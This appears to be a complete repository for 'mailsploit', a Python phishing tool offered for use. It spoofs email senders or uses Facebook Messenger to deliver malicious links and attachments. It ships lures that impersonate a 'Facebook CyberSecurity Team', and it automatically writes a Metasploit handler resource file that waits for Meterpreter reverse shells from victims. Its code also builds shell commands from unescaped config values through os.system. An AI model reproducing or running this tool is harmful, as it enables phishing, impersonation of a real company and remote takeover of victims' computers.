MailSpoof Report

├── README.md ├── config ├── mailsploit.py └── setup.sh /README.md: -------------------------------------------------------------------------------- 1 | # mailsploit v1.1 2 | Sends some one a malicious payload through smtp or FB messenger and starts a listener with metasploit. 3 | 4 | ### MailSploit Now Supports Email Spoofing To Any SMTP Server 5 | ### MailSploit Can Now Send Malicious Links To FB Messenger Accounts 6 | 7 | ### Requirements 8 | You need to have metasploit installed in order for this to work. 9 | Kali Linux has it already installed. 10 | 11 | * https://www.metasploit.com/ 12 | * Create an account with - https://www.smtp2go.com 13 | 14 | 15 | ### How to Install 16 | 17 | > sh setup.sh 18 | 19 | ### How to use 20 | 21 | Setup your config file, replace everything that says None with the information that is necessary. 22 | 23 | Then run, 24 | 25 | > python mailsploit.py 26 | 27 | **You will be prompt to paste in a link, to do this just upload it to a free file hosting server, copy the link and paste it.** 28 | **You can also use a phishing site created from the social engineering toolkit.** 29 | 30 | ### Some Useful Links 31 | * [https://nofile.io/ ](https://nofile.io/ ) 32 | * [https://github.com/trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) 33 | 34 | You will be able to upload any files. 35 | 36 | happy hacking. ;) 37 | 38 | ### Remember: 39 | ### This cannot be used for illegal activities, I'm not to blame if you get into trouble 40 | -------------------------------------------------------------------------------- /config: -------------------------------------------------------------------------------- 1 | [Config] 2 | 3 | ######################### 4 | # SMTP Credentials 5 | ######################### 6 | smtpEmail = None 7 | smtpPass = None 8 | 9 | 10 | ########################################### 11 | # 12 | # Setup an account at http://www.smtp2go.com/‎ 13 | # 14 | ########################################### 15 | smtpGoServer = mail.smtp2go.com:2525 16 | 17 | ############################################# 18 | ### Define your SMTP Credentials ## 19 | ## Servers such as, Gmail, Yahoo, Outlook ## 20 | ############################################# 21 | smtpServer = smtp.gmail.com:587 22 | 23 | ######################################## 24 | ### Define your Facebook credentials ### 25 | ######################################## 26 | fbusername = None 27 | fbpassword = None 28 | 29 | ###################### 30 | ### Facebook Stuff ### 31 | ###################### 32 | fbuser = None 33 | fbuserID = None 34 | fbmessage = Hi John, We have found that your account has been accessed by multiple accounts. 35 | Do you want us to do a security check, if yes, we need you to authorize your account so we can 36 | have a look. 37 | 38 | 39 | 40 | 41 | ################## 42 | ### Mail stuff ### 43 | ################## 44 | # Make sure this stays in this format. 45 | goodByeName = Yours sincerely,
Jack
46 | ####################################################################### 47 | 48 | ############################# 49 | # Either True / False 50 | ############################# 51 | enabledSpoofing = False 52 | 53 | 54 | ############################# 55 | # The Spoofed email address, 56 | # This might come up as spam. 57 | ############################# 58 | spoofEmail = facebook-non-reply@gmail.com 59 | 60 | 61 | ############################## 62 | # The target email address. 63 | ############################## 64 | targetEmail = None 65 | 66 | 67 | ################################################# 68 | # File Attachment 69 | # -------------- 70 | # Email Providers will block suspicious files 71 | ################################################# 72 | attachment = None 73 | 74 | 75 | 76 | 77 | ####################################################################### 78 | # The subject 79 | ####################################################################### 80 | subject = Facebook CyberSecurity Team: Authorization Email 81 | ####################################################################### 82 | 83 | 84 | ####################################################################### 85 | # Make sure this stays in this format. 86 | # 87 | # Must be greater than 10 characters 88 | ####################################################################### 89 | message = Hi Peter,

90 | We have found that your account has been accessed by multiple accounts. 91 | Do you want us to do a security check, if yes, we need you to authorize your account so we can 92 | have a look. 93 | 94 | ##################################### 95 | # Custom HTML Message 96 | ##################################### 97 | isCustomHTML = False 98 | customHTML = message.html 99 | 100 | 101 | -------------------------------------------------------------------------------- /mailsploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ############################################################# 3 | # 4 | # Title: mailsploit.py 5 | # Author: Th3J0k3r 6 | # 7 | # Purpose: to be able to send a malicious link via email 8 | # to gain access to someones machine. 9 | # 10 | ############################################################ 11 | import subprocess 12 | import socket 13 | import ConfigParser 14 | import mimetypes 15 | import mechanize 16 | import time 17 | import os 18 | from lazyme.string import color_print 19 | import string 20 | from fbchat import Client 21 | from fbchat.models import * 22 | from fbchat import log, Client 23 | 24 | 25 | # 26 | # Prints a banner. 27 | # 28 | def banner (): 29 | 30 | os.system("clear") 31 | color_print( 32 | """ 33 | 34 | 35 | '||\ /||` '||` .|'''| '||` || 36 | ||\\.//|| '' || || || '' || 37 | || || '''|. || || `|'''|, '||''|, || .|''|, || ''||'' 38 | || || .|''|| || || . || || || || || || || || 39 | .|| ||. `|..||. .||. .||. |...|' ||..|' .||. `|..|' .||. `|..' 40 | || 41 | .|| 42 | 43 | Mail Exploitation Framework 44 | v1.1 45 | """, color='red') 46 | 47 | 48 | # 49 | # Sets up the configuration file. 50 | # 51 | def setup (): 52 | 53 | # Setup the config file 54 | global enabledSpoofing 55 | global targetEmail 56 | global spoofEmail 57 | global smtpEmail 58 | global smtpPass 59 | global smtpGoServer 60 | global smtpServer 61 | global subject 62 | global message 63 | global attachment 64 | global isCustomHTML 65 | global customHTML 66 | global goodByeName 67 | global fbusername 68 | global fbpassword 69 | global fbmessage 70 | global fbuser 71 | global fbuserID 72 | 73 | configParser = ConfigParser.RawConfigParser() 74 | configParser.read('config') 75 | targetEmail = configParser.get('Config', 'targetEmail') 76 | enabledSpoofing = configParser.get('Config', 'enabledSpoofing') 77 | spoofEmail = configParser.get('Config', 'spoofEmail') 78 | attachment = configParser.get('Config', 'attachment') 79 | smtpEmail = configParser.get('Config', 'smtpEmail') 80 | smtpPass = configParser.get('Config', 'smtpPass') 81 | smtpGoServer = configParser.get('Config', 'smtpGoServer') 82 | smtpServer = configParser.get('Config', 'smtpServer') 83 | goodByeName = configParser.get('Config', 'goodByeName') 84 | subject = configParser.get('Config', 'subject') 85 | message = configParser.get('Config', 'message') 86 | isCustomHTML = configParser.get('Config', 'isCustomHTML') 87 | customHTML = configParser.get('Config', 'customHTML') 88 | fbuser = configParser.get('Config', 'fbuser') 89 | fbusername = configParser.get('Config', 'fbusername') 90 | fbpassword = configParser.get('Config', 'fbpassword') 91 | fbmessage = configParser.get('Config', 'fbmessage') 92 | fbuserID = configParser.get('Config', 'fbuserID') 93 | 94 | # Check if the message is greater than 10 characters 95 | if len(message) >= 10: 96 | 97 | try: 98 | 99 | fb = raw_input("Did you want to send to facebook messenger: [Y/n] ") 100 | if fb == 'No' or fb == 'n' or fb == 'no': 101 | 102 | global isUsingMessenger 103 | 104 | if (enabledSpoofing == 'True'): 105 | 106 | color_print("Make sure to sign up to https://www.smtp2go.com\nand setup the config file with the required information.", color='yellow') 107 | smtpgo = raw_input("Have you setup a SMTPGO account and setup the config file properly: [Y/n] ") 108 | if (smtpgo == 'Y' or smtpgo == 'y' or smtpgo == 'Yes' or smtpgo == 'yes'): 109 | 110 | color_print("[+] Email spoofing enabled", color='green') 111 | 112 | # Validate the input. 113 | if (goodByeName == 'None' or targetEmail == 'None' or spoofEmail == 'None' or smtpEmail == 'None' or smtpPass == 'None' or smtpGoServer == 'None'): 114 | color_print('[!] Please setup your config file. make sure you create an account at https://www.smtp2go.com', color='red') 115 | return 116 | else: 117 | # Connects to the server. 118 | isUsingMessenger = False 119 | sendMail(smtpGoServer, targetEmail, spoofEmail, smtpEmail, smtpPass, subject, message, goodByeName) 120 | 121 | else: 122 | 123 | 124 | color_print("[+] Email spoofing false", color='red') 125 | 126 | # Validate the input. 127 | if (goodByeName == 'None' or targetEmail == 'None' or spoofEmail == 'None' or smtpEmail == 'None' or smtpPass == 'None' or smtpServer == 'None'): 128 | color_print('[!] Please setup your config file', color='red') 129 | return 130 | else: 131 | # Connects to the server. 132 | isUsingMessenger = False 133 | sendMail(smtpServer, targetEmail, smtpEmail, smtpEmail, smtpPass, subject, message, goodByeName) 134 | else: 135 | # Validate the input. 136 | if (fbusername == 'None' or fbpassword == 'None' or fbmessage == 'None' or fbuserID == 'None'): 137 | color_print('[!] Please setup your config file.', color='red') 138 | return 139 | else: 140 | isUsingMessenger = True 141 | sendToMessenger() 142 | 143 | except KeyboardInterrupt: 144 | color_print("\nThanks, Happy hacking", color='blue') 145 | return 146 | else: 147 | color_print("[!] Please type in a longer message", color='red') 148 | return 149 | 150 | def sendToMessenger(): 151 | 152 | client = Client(fbusername, fbpassword) 153 | color_print("[+] Logged in to " + fbusername, color='green') 154 | # `searchForUsers` searches for the user and gives us a list of the results, 155 | # and then we just take the first one, aka. the most likely one: 156 | color_print("[+] Searching for user " + fbuser, color='blue') 157 | global user 158 | try: 159 | user = client.searchForUsers(fbuser)[0] 160 | 161 | if user.name == fbuser: 162 | 163 | 164 | color_print("[+] Found user " + user.name, color='green') 165 | time.sleep(2) 166 | 167 | print('user ID: {}'.format(user.uid)) 168 | print("user's name: {}".format(user.name)) 169 | print("user's photo: {}".format(user.photo)) 170 | print("Is user client's friend: {}".format(user.is_friend)) 171 | 172 | send = raw_input("Do you want to send the malicious message: [Y/n] ") 173 | if (send == 'Y' or send == 'Yes' or send == 'yes' or send == 'y'): 174 | 175 | try: 176 | color_print("[+] Sending malicious message to facebook messenger", color='blue') 177 | # Will send a message to the thread 178 | global link 179 | link = getLink() 180 | client.send(Message(text=fbmessage + "\n" + link), thread_id=fbuserID, thread_type=ThreadType.USER) 181 | color_print("[+] Message Sent. ", color='blue') 182 | listenForConnections() 183 | except FBchatFacebookError: 184 | color_print("[!] There might be a problem try making sure the facebook ID is correct", color='red') 185 | 186 | else: 187 | color_print("[!] No User found", color='red') 188 | return 189 | except IndexError: 190 | color_print("\n[!] Something bad happended :(", color='red') 191 | return 192 | # 193 | # Connects to the smtp server. 194 | # 195 | def sendMail(server, toAddr, address, username, password, subject, message, goodBye): 196 | # attempt to connect to the stmp server. 197 | try: 198 | 199 | try: 200 | 201 | # Get the link 202 | link = getLink() 203 | color_print("[+] Sending email to.. " + toAddr, color='blue') 204 | time.sleep(1) 205 | if (enabledSpoofing == 'True'): color_print("[+] Spoofing email.. " + address, color='blue') 206 | time.sleep(1) 207 | color_print("[*] Sending malicious link..", color='yellow') 208 | time.sleep(1) 209 | 210 | 211 | # Check if the user wants to load a custom html file 212 | if (isCustomHTML == 'True'): 213 | 214 | # Only open a custom HTML file if it exists. 215 | if (os.path.isfile(customHTML)): 216 | 217 | color_print("[+] Loading custom HTML Message", color='green') 218 | 219 | CustomHTML = open(customHTML, 'r') 220 | 221 | 222 | if (os.path.isfile(attachment)==False and attachment == 'None'): 223 | 224 | # Send the mail. 225 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 226 | listenForConnections() 227 | CustomHTML.close() 228 | else: 229 | color_print("[+] Sending attachment", color='green') 230 | # Send the mail 231 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -a " + attachment + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 232 | listenForConnections() 233 | CustomHTML.close() 234 | else: 235 | color_print("[!] Custom HTML Does not exists!!", color='red') 236 | return 237 | else: 238 | 239 | 240 | # Print out a thew important messages. 241 | 242 | 243 | MessageFile = open('message.html', 'w') 244 | MessageFile.write(""" 245 | """+message+""" 246 |

247 | """+link+""" 248 |
"""+goodBye+"""
249 | """) 250 | MessageFile.close() 251 | 252 | if (os.path.isfile(attachment)==False and attachment == 'None'): 253 | 254 | # Send the mail. 255 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 256 | listenForConnections() 257 | else: 258 | color_print("[+] Sending attachment", color='green') 259 | # Send the mail 260 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -a " + attachment + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 261 | listenForConnections() 262 | 263 | 264 | except KeyboardInterrupt: 265 | color_print("\nThanks, Happy hacking", color='blue') 266 | return 267 | 268 | except socket.gaierror: 269 | # Failed to connect!!. 270 | color_print("\n[!] Could not connect to the server.", color='red') 271 | return 272 | 273 | 274 | def getLink (): 275 | # Tell the user to upload there file. 276 | color_print("Upload it to a free file hosting website: https://nofile.io/", color='yellow') 277 | color_print("OR Paste in the IP Address of your malicious server", color='yellow') 278 | time.sleep(2) 279 | link = raw_input("\nPaste your malicious link: \n") 280 | while len(link) == 0: link = raw_input("Paste your malicious link: ") 281 | return link 282 | 283 | # 284 | # Listen for a connection 285 | # 286 | def listenForConnections (): 287 | # Do you want to listen for any connections. 288 | 289 | try: 290 | 291 | listen = raw_input('Do you want to start up a listener: [Y/N]: ') 292 | if listen == 'Y' or listen == 'y' or listen == 'yes' or listen == 'Yes': 293 | color_print("[+] Starting a listener", color='blue') 294 | 295 | # Listen for a connection 296 | 297 | lhost = raw_input('What is your LHOST (local ip address): ') 298 | lport = raw_input('What is your LPORT (port): ') 299 | payload = raw_input('What is your payload: (eg windows/meterpreter/reverse_tcp): ') 300 | if payload == '': 301 | payload = 'windows/meterpreter/reverse_tcp' 302 | 303 | if os.path.isfile('resource.rc'): 304 | os.system('rm resource.rc') 305 | os.system('touch resource.rc') 306 | os.system('echo use exploit/multi/handler >> resource.rc') 307 | os.system('echo set PAYLOAD ' + payload + ' >> resource.rc') 308 | os.system('echo set LHOST ' + lhost + ' >> resource.rc') 309 | os.system('echo set LPORT ' + lport + ' >> resource.rc') 310 | os.system('echo set ExitOnSession false >> resource.rc') 311 | os.system('echo exploit -j -z >> resource.rc') 312 | os.system('cat resource.rc') 313 | os.system('msfconsole -r resource.rc') 314 | else: 315 | ####################################################### 316 | # This call is still in development 317 | ####################################################### 318 | #color_print("[+] Generated a report..", color='green') 319 | #if isUsingMessenger == False: 320 | # generateMailReport(fromAddr, toAddr, spoofName, subject, message, html) 321 | #else: 322 | # generateMessengerReport(fbuser, fbuserID, fbmessage, link) 323 | #color_print("\nThanks, Happy hacking", color='blue') 324 | return 325 | except KeyboardInterrupt: 326 | color_print("\nThanks, Happy hacking", color='blue') 327 | return 328 | 329 | 330 | ####################################################### 331 | # This function is still in development 332 | ####################################################### 333 | def generateMessengerReport(fbuser, fbuserID, message, link): 334 | f = open("reports/" + fbuser + ".html", "w") 335 | f.write(""" 336 | 337 | 338 |

339 |

340 |

341 | 342 | MailSpoof Report 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 |

User	ID	Message	Link
""" + str(fbuser) +"""	""" + str(fbuserID) +"""	""" + str(message) +"""	"""+link+"""

357 | """) 358 | f.close() 359 | 360 | ####################################################### 361 | # This function is still in development 362 | ####################################################### 363 | def generateMailReport(fromemail, toemail, spoofemail, subject, message, link): 364 | f = open("reports/" + toemail + ".html", "w") 365 | f.write(""" 366 | 367 | 368 | 369 | MailSpoof Report 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 387 |

From Email	To Email	Spoofed Email	Subject	Message	Link
""" + str(fromemail) +"""	""" + str(toemail) +"""	""" + str(spoofemail) +"""	""" + str(subject) +"""	""" + str(message) +"""	""" + str(link) + """

388 | """) 389 | f.close() 390 | 391 | 392 | #### Call the methods #### 393 | banner() 394 | setup() 395 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | echo "================================================" 2 | echo "[============== MAIL SPLOIT INSTALLER ==========]" 3 | echo "================================================" 4 | 5 | echo "\n[+] Installing mailsploit\n" 6 | 7 | pip install color_print 8 | pip install lazyme 9 | pip install ConfigParser 10 | pip install yagmail 11 | pip install fbchat 12 | 13 | echo "\n[+] Creating some directorys." 14 | mkdir reports 15 | 16 | echo "\n done" 17 | --------------------------------------------------------------------------------